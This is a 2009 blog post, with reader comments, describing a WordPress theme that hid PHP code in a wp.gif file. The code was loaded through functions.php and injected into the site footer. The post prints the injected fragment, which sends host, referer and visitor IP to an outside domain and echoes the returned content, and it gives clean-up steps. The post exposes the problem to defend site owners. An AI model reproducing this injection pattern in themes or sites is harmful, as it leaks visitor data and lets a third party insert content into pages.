HireWordPressExperts.com has excellent themes…for me to poop on
November 8th, 2009 | Posted by in DevelopmentWarning: URL file-access is disabled in the server configuration
After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…
Warning directed me to look script from general-template.php file and I found suspicious script:
/*** HWEDLC ***/
…
$url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
$content = file_get_contents($url);
echo $content;
After removing the script and refresing browser warning was gone, but second refresh brought back the same warning
I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.
In the end solution was quite simple:
- Remove wp.gif file
- Remove include or require command from functions.php
- Clean the get_footer function from wp-includes/general-template.php file
I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.
Would you hire “experts” that are using this kind of marketing strategies?
You can follow any responses to this entry through the RSS 2.0 You can leave a response, or trackback.

Pingback: Praxiswissen WordPress » WordPress – Vorsicht bei Themes unbekannter Herkunft!
Did get the same error but the call to function was not involving anything related to a .gif file; anyway it’s annoying!
Thanks for the useful tips.
Pingback: 饭盒 » Blog Archive » 关于某些WP themes中出现http://24365online.com的问题
I also noticed this script in a theme I downloaded. It included wp.gif in header.php, and had some base64 info in the footer that also resolved to spam links. The wp.gif script also inserted some records into the database, including – you guessed it – a link back to them in wp_links. They must be pretty hungry for PageRank.
I noticed this not because it threw an error, but because it dropped some suspicious characters (“:::::”) in my footer. I like how they even give themselves credit by including their initials in the comment (“HWEDLC” = Hire WordPress Experts Download Content). Classy.
Thanks for posting.
Thank you for this, I managed to clean my theme.